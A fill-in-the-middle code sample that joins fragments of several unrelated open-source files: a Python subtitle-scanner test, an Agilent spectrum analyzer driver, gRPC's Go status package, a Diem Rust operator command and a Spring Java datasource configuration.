open(os.path.join(TEST_DIR, os.path.split(video.name)[1]), 'w').close()
def tearDown(self):
shutil.rmtree(TEST_DIR)
def test_scan_video_movie(self):
video = MOVIES[0]
scanned_video = scan_video(os.path.join(TEST_DIR, os.path.split(video.name)[1]))
self.assertEqual(scanned_video.name, os.path.join(TEST_DIR, os.path.split(video.name)[1]))
self.assertEqual(scanned_video.title.lower(), video.title.lower())
self.assertEqual(scanned_video.year, video.year)
self.assertEqual(scanned_video.video_codec, video.video_codec)
self.assertEqual(scanned_video.format, video.format)
self.assertEqual(scanned_video.resolution, video.resolution)
self.assertEqual(scanned_video.release_group, video.release_group)
self.assertEqual(scanned_video.subtitle_languages, set())
self.assertEqual(scanned_video.hashes, {})
self.assertIsNone(scanned_video.audio_codec)
self.assertIsNone(scanned_video.imdb_id)
self.assertEqual(scanned_video.size, 0)
def test_scan_video_episode(self):
video = EPISODES[0]
scanned_video = scan_video(os.path.join(TEST_DIR, os.path.split(video.name)[1]))
self.assertEqual(scanned_video.name, os.path.join(TEST_DIR, os.path.split(video.name)[1]))
self.assertEqual(scanned_video.series, video.series)
self.assertEqual(scanned_video.season, video.season)
self.assertEqual(scanned_video.episode, video.episode)
self.assertEqual(scanned_video.video_codec, video.video_codec)
self.assertEqual(scanned_video.format, video.format)
self.assertEqual(scanned_video.resolution, video.resolution)
self.assertEqual(scanned_video.release_group, video.release_group)
self.assertEqual(scanned_video.subtitle_languages, set())
self.assertEqual(scanned_video.hashes, {})
self.assertIsNone(scanned_video.title)
self.assertIsNone(scanned_video.tvdb_id)
self.assertIsNone(scanned_video.imdb_id)
self.assertIsNone(scanned_video.audio_codec)
self.assertEqual(scanned_video.size, 0)
def test_scan_video_subtitle_language_und(self):
video = EPISODES[0]
open(os.path.join(TEST_DIR, os.path.splitext(os.path.split(video.name)[1])[0]) + '.srt', 'w').close()
scanned_video = scan_video(os.path.join(TEST_DIR, os.path.split(video.name)[1]))
self.assertEqual(scanned_video.subtitle_languages, {Language('und')})
def test_scan_video_subtitles_language_eng(self):
video = EPISODES[0]
open(os.path.join(TEST_DIR, os.path.splitext(os.path.split(video.name)[1])[0]) + '.en.srt', 'w').close()
scanned_video = scan_video(os.path.join(TEST_DIR, os.path.split(video.name)[1]))
self.assertEqual(scanned_video.subtitle_languages, {Language('eng')})
def test_scan_video_subtitles_languages(self):
video = EPISODES[0]
open(os.path.join(TEST_DIR, os.path.splitext(os.path.split(video.name)[1])[0]) + '.en.srt', 'w').close()
open(os.path.join(TEST_DIR, os.path.splitext(os.path.split(video.name)[1])[0]) + '.fr.srt', 'w').close()
open(os.path.join(TEST_DIR, os.path.splitext(os.path.split(video.name)[1])[0]) + '.srt', 'w').close()
scanned_video = scan_video(os.path.join(TEST_DIR, os.path.split(video.name)[1]))
self.assertEqual(scanned_video.subtitle_languages, {Language('eng'), Language('fra'), Language('und')})
def suite():
suite = TestSuite()
suite.addTest(TestLoader().loadTestsFromTestCase(ApiTestCase))
suite.addTest(TestLoader().loadTestsFromTestCase(VideoTestCase))
return suite
if __name__ == '__main__':
TextTestRunner().run(suite())<|fim▁end|> | videos = [MOVIES[0]]
languages = {Language('por', 'BR')}
subtitles = list_subtitles(videos, languages)
self.assertEqual(len(subtitles), len(videos)) |
<|file_name|>__init__.py<|end_file_name|><|fim▁begin|><|fim▁hole|><|fim▁end|> | """passlib tests""" |
<|file_name|>agilentBase8590A.py<|end_file_name|><|fim▁begin|>"""
Python Interchangeable Virtual Instrument Library
Copyright (c) 2013-2017 Alex Forencich
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
from .agilentBase8590 import *
class agilentBase8590A(agilentBase8590):
"Agilent 8590A series IVI spectrum analyzer driver"
def __init__(self, *args, **kwargs):
self.__dict__.setdefault('_instrument_id', '')
super(agilentBase8590A, self).__init__(*args, **kwargs)<|fim▁hole|>
def _display_fetch_screenshot(self, format='bmp', invert=False):
if self._driver_operation_simulate:
return b''
#if format not in ScreenshotImageFormatMapping:
# raise ivi.ValueNotSupportedException()
#format = ScreenshotImageFormatMapping[format]
self._write("PRINT 1")
rtl = io.BytesIO(self._read_raw())
img = hprtl.parse_hprtl(rtl)
# rescale to get white background
# presuming background of (90, 88, 85)
img[:,:,0] *= 255/90
img[:,:,1] *= 255/88
img[:,:,2] *= 255/85
bmp = hprtl.generate_bmp(img)
return bmp<|fim▁end|> |
self._identity_description = "Agilent 8590 series IVI spectrum analyzer driver"
self._identity_supported_instrument_models = ['8590A', '8590B', '8591A', '8592A', '8592B',
'8593A', '8594A', '8595A'] |
<|file_name|>status.go<|end_file_name|><|fim▁begin|>/*
*
* Copyright 2017 gRPC authors.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*
*/
// Package status implements errors returned by gRPC. These errors are
// serialized and transmitted on the wire between server and client, and allow
// for additional data to be transmitted via the Details field in the status
// proto. gRPC service handlers should return an error created by this
// package, and gRPC clients should expect a corresponding error to be
// returned from the RPC call.
//
// This package upholds the invariants that a non-nil error may not
// contain an OK code, and an OK code must result in a nil error.
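//
// For example (sketch), a service handler might return:
//
//	return nil, status.Errorf(codes.NotFound, "resource %q not found", name)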
package status
import (
"context"<|fim▁hole|>
"github.com/golang/protobuf/proto"
"github.com/golang/protobuf/ptypes"
spb "google.golang.org/genproto/googleapis/rpc/status"
"google.golang.org/grpc/codes"
"google.golang.org/grpc/internal"
)
func init() {
internal.StatusRawProto = statusRawProto
}
func statusRawProto(s *Status) *spb.Status { return s.s }
// statusError is an alias of a status proto. It implements error and Status,
// and a nil statusError should never be returned by this package.
type statusError spb.Status
func (se *statusError) Error() string {
p := (*spb.Status)(se)
return fmt.Sprintf("rpc error: code = %s desc = %s", codes.Code(p.GetCode()), p.GetMessage())
}
func (se *statusError) GRPCStatus() *Status {
return &Status{s: (*spb.Status)(se)}
}
// Status represents an RPC status code, message, and details. It is immutable
// and should be created with New, Newf, or FromProto.
type Status struct {
s *spb.Status
}
// Code returns the status code contained in s.
func (s *Status) Code() codes.Code {
if s == nil || s.s == nil {
return codes.OK
}
return codes.Code(s.s.Code)
}
// Message returns the message contained in s.
func (s *Status) Message() string {
if s == nil || s.s == nil {
return ""
}
return s.s.Message
}
// Proto returns s's status as an spb.Status proto message.
func (s *Status) Proto() *spb.Status {
if s == nil {
return nil
}
return proto.Clone(s.s).(*spb.Status)
}
// Err returns an immutable error representing s; returns nil if s.Code() is
// OK.
func (s *Status) Err() error {
if s.Code() == codes.OK {
return nil
}
return (*statusError)(s.s)
}
// New returns a Status representing c and msg.
func New(c codes.Code, msg string) *Status {
return &Status{s: &spb.Status{Code: int32(c), Message: msg}}
}
// Newf returns New(c, fmt.Sprintf(format, a...)).
func Newf(c codes.Code, format string, a ...interface{}) *Status {
return New(c, fmt.Sprintf(format, a...))
}
// Error returns an error representing c and msg. If c is OK, returns nil.
func Error(c codes.Code, msg string) error {
return New(c, msg).Err()
}
// Errorf returns Error(c, fmt.Sprintf(format, a...)).
func Errorf(c codes.Code, format string, a ...interface{}) error {
return Error(c, fmt.Sprintf(format, a...))
}
// ErrorProto returns an error representing s. If s.Code is OK, returns nil.
func ErrorProto(s *spb.Status) error {
return FromProto(s).Err()
}
// FromProto returns a Status representing s.
func FromProto(s *spb.Status) *Status {
return &Status{s: proto.Clone(s).(*spb.Status)}
}
// FromError returns a Status representing err if it was produced from this
// package or has a method `GRPCStatus() *Status`. Otherwise, ok is false and a
// Status is returned with codes.Unknown and the original error message.
func FromError(err error) (s *Status, ok bool) {
if err == nil {
return &Status{s: &spb.Status{Code: int32(codes.OK)}}, true
}
if se, ok := err.(interface {
GRPCStatus() *Status
}); ok {
return se.GRPCStatus(), true
}
return New(codes.Unknown, err.Error()), false
}
// Convert is a convenience function which removes the need to handle the
// boolean return value from FromError.
func Convert(err error) *Status {
s, _ := FromError(err)
return s
}
// WithDetails returns a new status with the provided details messages appended to the status.
// If any errors are encountered, it returns nil and the first error encountered.
func (s *Status) WithDetails(details ...proto.Message) (*Status, error) {
if s.Code() == codes.OK {
return nil, errors.New("no error details for status with code OK")
}
// s.Code() != OK implies that s.Proto() != nil.
p := s.Proto()
for _, detail := range details {
any, err := ptypes.MarshalAny(detail)
if err != nil {
return nil, err
}
p.Details = append(p.Details, any)
}
return &Status{s: p}, nil
}
// Details returns a slice of details messages attached to the status.
// If a detail cannot be decoded, the error is returned in place of the detail.
func (s *Status) Details() []interface{} {
if s == nil || s.s == nil {
return nil
}
details := make([]interface{}, 0, len(s.s.Details))
for _, any := range s.s.Details {
detail := &ptypes.DynamicAny{}
if err := ptypes.UnmarshalAny(any, detail); err != nil {
details = append(details, err)
continue
}
details = append(details, detail.Message)
}
return details
}
// Code returns the Code of the error if it is a Status error, codes.OK if err
// is nil, or codes.Unknown otherwise.
func Code(err error) codes.Code {
// Don't use FromError to avoid allocation of OK status.
if err == nil {
return codes.OK
}
if se, ok := err.(interface {
GRPCStatus() *Status
}); ok {
return se.GRPCStatus().Code()
}
return codes.Unknown
}
// FromContextError converts a context error into a Status. It returns a
// Status with codes.OK if err is nil, or a Status with codes.Unknown if err is
// non-nil and not a context error.
func FromContextError(err error) *Status {
switch err {
case nil:
return New(codes.OK, "")
case context.DeadlineExceeded:
return New(codes.DeadlineExceeded, err.Error())
case context.Canceled:
return New(codes.Canceled, err.Error())
default:
return New(codes.Unknown, err.Error())
}
}<|fim▁end|> | "errors"
"fmt" |
<|file_name|>validator_operator.rs<|end_file_name|><|fim▁begin|>// Copyright (c) The Diem Core Contributors
// SPDX-License-Identifier: Apache-2.0
use diem_global_constants::OPERATOR_KEY;
use diem_management::{config::ConfigPath, constants, error::Error, secure_backend::SharedBackend};
use structopt::StructOpt;
#[derive(Debug, StructOpt)]
pub struct ValidatorOperator {
#[structopt(flatten)]
config: ConfigPath,
#[structopt(long)]
operator_name: String,
#[structopt(flatten)]
shared_backend: SharedBackend,<|fim▁hole|> let config = self
.config
.load()?
.override_shared_backend(&self.shared_backend.shared_backend)?;
let operator_name = self.operator_name;
// Verify the operator exists in the shared storage
let operator_storage = config.shared_backend_with_namespace(operator_name.clone());
let _ = operator_storage.ed25519_key(OPERATOR_KEY)?;
// Upload the operator name to shared storage
let mut shared_storage = config.shared_backend();
shared_storage.set(constants::VALIDATOR_OPERATOR, operator_name.clone())?;
Ok(operator_name)
}
}<|fim▁end|> | }
impl ValidatorOperator {
pub fn execute(self) -> Result<String, Error> { |
<|file_name|>CommonDBConfiguration.java<|end_file_name|><|fim▁begin|>/**
* <pre>
* Project: cargo-itest Created on: 26 nov. 2014 File: fCommonDBConfiguration.java
* Package: nl.tranquilizedquality.itest.configuration
*
* Copyright (c) 2014 Tranquilized Quality www.tr-quality.com All rights
* reserved.
*
* This software is the confidential and proprietary information of Dizizid
* ("Confidential Information"). You shall not disclose such Confidential
* Information and shall use it only in accordance with the terms of the license
* agreement you entered into with Tranquilized Quality.
* </pre>
*/
package nl.tranquilizedquality.itest.configuration;
import org.springframework.context.annotation.Bean;
import org.springframework.context.annotation.Configuration;
import org.springframework.jdbc.datasource.DataSourceTransactionManager;
import org.springframework.jdbc.datasource.SingleConnectionDataSource;
/**
* @author Salomo Petrus ([email protected])
* @since 26 nov. 2014
*
*/
@Configuration
public class CommonDBConfiguration extends DatasourceConfiguration {
@Bean(name = "transactionManager")
public DataSourceTransactionManager dataSourceTransactionManager(final SingleConnectionDataSource dataSource) {
<|fim▁hole|> return new DataSourceTransactionManager(dataSource);
}
}<|fim▁end|> |